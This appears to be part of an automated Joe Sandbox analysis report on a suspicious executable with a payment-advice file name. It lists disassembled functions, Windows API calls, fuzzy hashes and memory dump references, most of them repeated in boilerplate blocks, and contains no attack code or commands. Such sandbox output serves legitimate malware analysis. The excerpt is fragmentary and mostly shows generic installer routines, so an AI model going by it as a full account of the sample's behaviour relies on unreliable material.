                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3585118688-0
                                                                                                                                          • Opcode ID: 96a63fcb15c31092515fbc06d8af7092e29a6e5b1bb977936f441355406fc1b0
                                                                                                                                          • Instruction ID: 1710045f99402437403c6baccff52884d9c8abed8acdccfc98223cb8aca5cd2d
                                                                                                                                          • Opcode Fuzzy Hash: 96a63fcb15c31092515fbc06d8af7092e29a6e5b1bb977936f441355406fc1b0
                                                                                                                                          • Instruction Fuzzy Hash: DC11A171D04204EBCF109FA0CD459DE7AB5EB04318F20447BE505B61E0C3798A82DF99
                                                                                                                                          APIs
                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00405137
                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405188
                                                                                                                                            • Part of subcall function 0040417B: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                           • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                          • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                                                          • Instruction ID: e96fcdb8fef6e8ad8397e3324e9c6cbe2a99463e9dbc89d2689884753c01e048
                                                                                                                                          • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                                                                          • Instruction Fuzzy Hash: 9C019E71A00608AFDF215F11DD84FAB3A26EB84354F104136FA007E2E0C37A8C929E69
                                                                                                                                          APIs
                                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                                                          Strings
                                                                                                                                          • Error launching installer, xrefs: 00405678
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                           • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                          • String ID: Error launching installer
                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                          • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                                          • Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
                                                                                                                                          • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                                                                          • Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 004061E1
                                                                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                            • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 004061F5
                                                                                                                                            • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 00406208
                                                                                                                                          • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403512), ref: 00403347
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                                          • API String ID: 4115351271-2030658151
                                                                                                                                          • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                                                                                                          • Instruction ID: 15e16a0f1bb74d2da72680a3c6f5190242cf739030cfb371398593c950d8801c
                                                                                                                                          • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                                                                                                                          • Instruction Fuzzy Hash: 65D0C92250693171C55236663E06FCF166C8F4A32AF129077F805B90D6DB7C2A8245FE
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                                          • Instruction ID: 0bcb7f2cf841bf472a0df6abca0e2eee6c891e9108e2cead3d2ea24e9771fd10
                                                                                                                                          • Opcode Fuzzy Hash: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                                                                          • Instruction Fuzzy Hash: D6A15671E00229CBDF28CFA8C854BADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                                          • Instruction ID: 5ff8dc76d646c522b35349404ae71f3a07db7e5a5a41cf42f501ef55767b32d6
                                                                                                                                          • Opcode Fuzzy Hash: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                                          • Instruction Fuzzy Hash: DD913470E04229CBEF28CF98C8547ADBBB1FF44305F15816AD852BB291C7789996DF44
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                                                          • Instruction ID: bb31d40f455f6cff8f0b7d4569728449f81f985eb729d97d8cba9c35205a948c
                                                                                                                                          • Opcode Fuzzy Hash: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                                                          • Instruction Fuzzy Hash: A6814471E04228CBDF24CFA8C844BADBBB1FF44305F25816AD456BB281C7789996DF44
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                                          • Instruction ID: e59bb743c0d69fedc8ec9c1b53f92d0ee49f9853fc7f4c6d73f4ee5c7875ed1f
                                                                                                                                          • Opcode Fuzzy Hash: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                                          • Instruction Fuzzy Hash: FE816671E04228DBDF24CFA8C8447ADBBB0FF44305F15816AD856BB281C7786996DF44
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                                                          • Instruction ID: 9556348457f1f5f1301c48e47fc8538a45dff02eab8277f34011f15b85b09a92
                                                                                                                                          • Opcode Fuzzy Hash: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                                                          • Instruction Fuzzy Hash: 43711271E00228DBDF28CF98C854BADBBB1FF48305F15806AD816BB281C7789996DF54
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
• Instruction ID: ef61438920200bd82941886013112b5956151ce3a95704f571d29bdd470ffe0d
• Opcode Fuzzy Hash: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
• Instruction Fuzzy Hash: FF713571E00228DBDF28CF98C854BADBBB1FF44305F15806AD856BB291C7789996DF44
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
• Instruction ID: 0528ad5c4640a45b82c18dce6d1929194436f5f2edf35a138e23b2c729619556
• Opcode Fuzzy Hash: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
• Instruction Fuzzy Hash: AD714671E00228DBDF28CF98C854BADBBB1FF44305F15806AD816BB291C778AA56DF44
APIs
• GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
  • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
  • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
  • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
  • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
• LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
• FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
• String ID:
• API String ID: 334405425-0
• Opcode ID: ad4472eb048fd4f86da61da74e9e5b3811a19dd42f4402be3bbdcdbc4c44a188
• Instruction ID: 2e01ab74a4c934f7e6015694823d512690d69bb111ffb1ad89b514660c000c84
• Opcode Fuzzy Hash: ad4472eb048fd4f86da61da74e9e5b3811a19dd42f4402be3bbdcdbc4c44a188
• Instruction Fuzzy Hash: 65219871904215F6CF106F95CE48ADEBAB4AB04358F70417BF601B51E0D7B94D41DA6D
APIs
• GlobalFree.KERNEL32(00000000), ref: 00401B92
• GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BA4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Global$AllocFree
• String ID: Call
• API String ID: 3394109436-1824292864
• Opcode ID: c87ee951b69e9287724da4c2fa38da0a671d257472e11f53d94c14b3c1b0481d
• Instruction ID: 0d74e211bf3f77f63613a954a16e526c6d046d9130d490d95d437df5f5263094
• Opcode Fuzzy Hash: c87ee951b69e9287724da4c2fa38da0a671d257472e11f53d94c14b3c1b0481d
• Instruction Fuzzy Hash: 2F2196B2604501ABCB10EB94DE8599FB3A8EB44318B24053BF541B32D1D778AC019FAD
APIs
  • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,00000B6D,00000000,00000022,00000000,?,?), ref: 00402C6C
• RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402483
• RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402496
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsh2473.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Enum$CloseOpenValue
• String ID:
• API String ID: 167947723-0
• Opcode ID: 517814c6f651ee240b61b165206d5ac0b3e0be0642415c803f06eaab78b10a68
• Instruction ID: d1cba53e09d25e0e4976289683f2ac1bdc9fdbf0613ee45d63c2eeb4b4bf5101
• Opcode Fuzzy Hash: 517814c6f651ee240b61b165206d5ac0b3e0be0642415c803f06eaab78b10a68
• Instruction Fuzzy Hash: 8AF0D1B1A04204AFEB148FA5DE88EBF767CEF40358F10483EF001A21C0D2B85D41DB2A
APIs
Memory Dump Source
• Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: ErrorFileLastRead
• String ID:
• API String ID: 1948546556-0
• Opcode ID: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
• Instruction ID: 346bc7c3d20138bcfc700b2b1684b28c90b224d1e8b0175626a50a5a3d135241
• Opcode Fuzzy Hash: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
• Instruction Fuzzy Hash: 0E51A2BA905215DFFB10DFA4DC8275937A8EB443D4F22C42AEA049721DCF34A991CB55
APIs
  • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,00000B6D,00000000,00000022,00000000,?,?), ref: 00402C6C
• RegQueryValueExW.KERNELBASE(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsh2473.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
